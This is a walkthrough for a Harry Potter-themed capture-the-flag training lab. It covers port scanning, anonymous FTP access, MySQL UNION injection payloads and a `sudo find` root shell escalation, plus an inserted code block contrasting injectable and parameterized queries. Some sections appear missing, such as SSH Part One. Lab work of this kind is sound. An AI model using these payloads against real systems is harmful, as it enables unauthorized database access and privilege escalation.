🪄 Welcome to Hogwarts School of Witchcraft and Wizardry 🪄
The Wizarding Cup tournament is about to begin.
Your objective is to explore this enchanted environment, uncover hidden secrets, and find various hidden FLAGS that test your skill in mastering digital magic.
Prepare to face privilege escalation challenges and prove you are worthy of being a true wizard or witch.
Are you ready to accept the challenge and unravel the mysteries of Hogwarts?
May the magic be with you!
REQUIREMENTS
1. Start the container:
./auto_deploy.sh hogwarts-ctf.tar
2. Start with nmap to check which ports are open:
nmap -sS -sV -Pn IP-Lab
When you scan the host's default interface in the Docker bridge network, you're actually scanning the host from outside the container, not the ports that Docker has mapped locally on your machine.
To see the mapped ports instead, run: nmap -sS -sV -Pn localhost
If you scan localhost, you will see the ports Docker has mapped onto the host (for example, 8080:80, 2222:22, etc.), because Docker performs NAT and exposes those ports locally on your system.
Good luck with the challenge, and may the magic be with you!
SOLUTION TO THE CYBER EXERCISE
Port Scanning
The first thing we should do once the container is running is to perform a port scan to determine where to begin our investigation.
Solution: nmap -sS -sV -Pn localhost
This will return a list of open ports. In this case, the ports would be:
• Port 2121
• Port 2222
• Port 8080
• Port 8443
HINT: I would start in order, that is, with port 2121.
FTP Service
Our FTP (File Transfer Protocol) service is located on port 2121. To access it, you would need credentials, but since we don't know them...
A typical weakness in this protocol is a misconfiguration that allows anonymous logins. To check for it, we simply need to:
HINT: Try logging in as an anonymous user
• ftp localhost 2121, then enter anonymous as the username (Press Enter)
• When prompted for the password (Press Enter)
Now that we're in, we can investigate if any relevant information has been left and read it. In this case, we've obtained credentials for the user "hermione".
• ftp localhost 2121, then enter hermione as the username
• Enter the password we found for that user
If we log in again with the new credentials, we'll have access to Tom Riddle's diary and obtain a new clue for the next service (Web).
Web Service Part One
If we open our browser and enter https://localhost:8080 in the URL bar, we can access the Ministry of Magic's website. There, we'll find a search engine for Ministry documents.
The first thing you'll see is a list of recently searched files. Ideally, the student should download them: copy each file name from the suggestions, paste it into the search bar, and download it. This is a rabbit hole (a deliberate distraction that makes you waste time digging through irrelevant information).
HINT: Copy the entire file name and then search.
When they get tired of searching, they should notice a login button at the top of the website. The credentials they should try are those of the user "hermione," as these are the only ones we have.
When logged in as "hermione," a new file will appear in the suggestions, but it will be partially hidden. If they try to download it, they'll get a message saying they don't have sufficient permissions.
The goal of this challenge is to gradually increase privileges and eventually become a website administrator.
Web Service Part Two
If we access our browser and enter https://localhost:8443 in the URL bar, we can access the Gringotts Bank website. Another search engine will appear, but this time we won't be searching for files. Instead, it will display information about famous people or other relevant data. To do this, we'll need to know SQL to query the linked database.
HINT: You should review SQL statements and remember UNION.
For this service, I have a user named albus_dumbledore who has normal user access to view their own database; the aim is to exploit a MySQL vulnerability to see more tables than just their own.
• View all records in the Azkaban table: ' OR '1'='1
• View the database name: ' UNION SELECT database(), null #
• View other tables in the database: ' UNION SELECT table_name, null FROM information_schema.tables WHERE table_schema = 'gringotts' #
• View specific columns in the desired table (such as ollivanders in this case): ' UNION SELECT column_name, null FROM information_schema.columns WHERE table_name = 'ollivanders' #
• View values in the ollivanders table: ' UNION SELECT info, null FROM ollivanders #
This last table will give us a clue for escalating privileges in SSH to go from the severus_snape user to the root user.
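To make the Gringotts weakness concrete from the defender's side, here is an added example (not part of the CTF's own code) with a constructed in-memory SQLite stand-in for the MySQL database: the search written by string splicing lets the page's two payloads dump the whole Azkaban table and read the ollivanders table, while the parameterized version treats the same input as plain data. SQLite is assumed in place of MySQL, so the MySQL `#` comment becomes `--`.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the CTF's gringotts database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE azkaban (name TEXT, info TEXT)")
    conn.execute("CREATE TABLE ollivanders (wand TEXT, info TEXT)")
    conn.executemany("INSERT INTO azkaban VALUES (?, ?)", [
        ("Sirius Black", "escaped 1993"),
        ("Bellatrix Lestrange", "life sentence"),
    ])
    conn.executemany("INSERT INTO ollivanders VALUES (?, ?)", [
        ("holly, phoenix feather", "CONSTRUCTED-CLUE: not the real flag"),
    ])
    conn.commit()
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # The bank's search as the walkthrough implies it is written: the search
    # term is spliced straight into the SQL text, so a quote in the term ends
    # the string literal and the rest of the input becomes SQL.
    sql = f"SELECT name, info FROM azkaban WHERE name = '{term}'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn: sqlite3.Connection, term: str) -> list:
    # Hardened version: the driver binds the term as a value, never as SQL,
    # so the same payloads are just names that match no prisoner.
    sql = "SELECT name, info FROM azkaban WHERE name = ?"
    return conn.execute(sql, (term,)).fetchall()


# The page's payloads; only the comment token differs (SQLite uses --, MySQL #).
DUMP_ALL = "' OR '1'='1"
CROSS_TABLE = "' UNION SELECT info, null FROM ollivanders --"


def leaks_other_table(rows: list) -> bool:
    # True when a result row carries the constructed clue from ollivanders.
    return any(row[0] is not None and "CONSTRUCTED-CLUE" in row[0] for row in rows)
```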
SSH Service Part Two
HINT: What should you check to escalate privileges? You did it before.
If we switch back to our user severus_snape and run the `sudo -l` command again, we can see that the `find` command can be executed as the root user by doing:
• `sudo find . -exec /bin/bash \;`
Now we'll be root, and by searching in the root directory, we'll find our last flag, and we'll have finished the CTF.